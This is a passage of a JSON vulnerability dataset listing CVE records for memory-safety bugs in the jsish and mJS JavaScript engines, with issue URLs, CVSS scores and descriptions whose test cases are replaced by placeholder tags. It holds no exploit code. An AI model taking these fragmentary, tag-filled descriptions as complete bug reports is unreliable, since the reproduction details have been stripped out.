        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/74",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/74",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:41:50Z",
        "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46490",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/67",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/67",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:35:45Z",
        "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46491",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/69",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/69",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:37:33Z",
        "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46492",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/71",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/71",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:38:56Z",
        "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case1 APITAG Test case2 ERRORTAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46494",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/78",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/78",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:45:48Z",
        "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46495",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/82",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/82",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:48:59Z",
        "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46496",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/83",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/83",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:49:33Z",
        "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46497",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/84",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/84",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:50:28Z",
        "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46498",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/81",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/81",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:48:23Z",
        "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46499",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/76",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/76",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:44:21Z",
        "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46500",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/85",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/85",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:51:56Z",
        "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46501",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/86",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/86",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:52:55Z",
        "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46502",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/87",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/87",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:53:39Z",
        "description": "Heap use after free ( PATHTAG ). Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46503",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/88",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/88",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T10:54:21Z",
        "description": "Heap use after free ( PATHTAG ). Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46504",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/51",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/51",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T09:40:19Z",
        "description": "Assertion `vp != APITAG failed at APITAG APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution steps & Output APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46505",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/53",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/53",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T09:43:02Z",
        "description": "Stack overflow in ( PATHTAG ). Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46506",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/52",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/52",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T09:41:38Z",
        "description": "Assertion `v >d.lval != v' failed at APITAG APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46507",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/54",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/54",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2021-12-24T09:43:48Z",
        "description": "Stack overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case1 APITAG Test case2 ERRORTAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46508",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/188",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/188",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:23:32Z",
        "description": "Assertion `i < parts_cnt' failed at APITAG struct mjs_bcode_part APITAG mjs , size_t).. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG Execution steps & Output CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46509",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/200",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/200",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:43:04Z",
        "description": "Stack overflow PATHTAG in snquote. mJS revision Commit: b1b6eac URLTAG Build steps CODETAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46510",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/185",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/185",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:20:39Z",
        "description": "Assertion `s < mjs >owned_strings.buf + mjs APITAG failed APITAG gc_mark_string.. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case ERRORTAG Execution steps & Output CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46511",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/183",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/183",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:18:57Z",
        "description": "Assertion `m >len >= sizeof(v)' failed at APITAG mjs_pop_val . mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution steps & Output APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46512",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/202",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/202",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:29:20Z",
        "description": "SEGV APITAG in mjs_apply. mJS revision Commit: b1b6eac URLTAG Version: Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46513",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/189",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/189",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:24:24Z",
        "description": "Global buffer overflow PATHTAG in mjs_mk_string. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46514",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/187",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/187",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:22:41Z",
        "description": "Assertion `ppos != NULL && mjs_is_number( ppos)' failed at APITAG int mjs_getretvalpos(struct mjs ).. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case ERRORTAG Execution steps & Output CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46515",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/186",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/186",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:21:24Z",
        "description": "Assertion `mjs_stack_size(&mjs >scopes) >= scopes_len' failed at APITAG mjs_execute.. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG Execution steps & Output CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46516",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/201",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/201",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T07:26:25Z",
        "description": "SEGV PATHTAG in mjs_stack_size. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46517",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/184",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/184",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:19:48Z",
        "description": "Assertion `mjs_stack_size(&mjs >scopes NUMBERTAG failed APITAG mjs_execute.. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case ERRORTAG Execution steps & Output CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46518",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/195",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/195",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:37:12Z",
        "description": "Heap buffer overflow APITAG in mjs_disown. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46519",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/194",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/194",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:36:16Z",
        "description": "Heap buffer overflow APITAG in mjs_array_length. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46520",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/193",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/193",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:35:03Z",
        "description": "Heap buffer overflow APITAG in mjs_jprintf. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46521",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/190",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/190",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:25:14Z",
        "description": "Global buffer overflow PATHTAG in mjs_mk_string. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46522",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/196",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/196",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:38:16Z",
        "description": "Heap buffer overflow ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46523",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/198",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/198",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:40:39Z",
        "description": "Heap buffer overflow PATHTAG in to_json_or_debug. mJS revision Commit: b1b6eac URLTAG Build steps CODETAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46524",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/192",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/192",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:33:31Z",
        "description": "Heap buffer overflow APITAG in snquote. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46525",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/199",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/199",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:41:58Z",
        "description": "Heap use after free APITAG in mjs_apply. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46526",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/191",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/191",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:31:36Z",
        "description": "Global buffer overflow APITAG in snquote. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46527",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/197",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/197",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2021-12-31T05:39:31Z",
